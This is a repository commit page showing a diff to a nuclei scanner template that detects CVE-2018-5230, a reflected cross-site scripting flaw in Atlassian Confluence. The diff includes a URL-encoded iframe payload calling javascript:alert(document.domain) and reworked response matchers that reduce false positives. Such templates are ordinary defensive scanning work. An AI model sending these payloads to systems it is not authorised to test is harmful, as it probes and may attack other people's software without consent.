daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update CVE-2018-5230.yaml (#3928) 

* Update CVE-2018-5230.yaml

Solves a false positive when the requests triggers a file download 

nuclei -debug -t nuclei-templates/cves/2018/CVE-2018-5230.yaml -u https://get-jama.replicated.com

* matcher fixes

Co-authored-by: sandeep <sandeep@projectdiscovery.io>
patch-1
Philippe Delteil 2022-03-18 02:25:28 -05:00 committed by GitHub
parent 895719ceaf
commit be3d2d42f1
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 16 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

23
cves/2018/CVE-2018-5230.yaml
View File

@ -4,26 +4,35 @@ info:
name: Atlassian Confluence Status-List XSS
author: madrobot
severity: medium
tags: cve,cve2018,atlassian,confluence,xss
description: |
The issue collector in Atlassian Jira before version 7.6.6, from version 7.7.0 before version 7.7.4, from version 7.8.0 before version 7.8.4 and from version 7.9.0 before version 7.9.2 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the error message of custom fields when an invalid value is specified.
reference: https://jira.atlassian.com/browse/JRASERVER-67289
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2018-5230
cwe-id: CWE-79
description: "The issue collector in Atlassian Jira before version 7.6.6, from version 7.7.0 before version 7.7.4, from version 7.8.0 before version 7.8.4 and from version 7.9.0 before version 7.9.2 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the error message of custom fields when an invalid value is specified."
reference:
- https://jira.atlassian.com/browse/JRASERVER-67289
tags: cve,cve2018,atlassian,confluence,xss
requests:
- method: GET
path:
- "{{BaseURL}}/pages/includes/status-list-mo%3CIFRAME%20SRC%3D%22javascript%3Aalert%281337%29%22%3E.vm"
- "{{BaseURL}}/pages/includes/status-list-mo%3Ciframe%20src%3D%22javascript%3Aalert%28document.domain%29%22%3E.vm"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "SRC=\"javascript:alert(1337)\">"
part: body
words:
- '<iframe src="javascript:alert(document.domain)">'
- 'confluence'
condition: and
- type: word
part: header
words:
- 'text/html'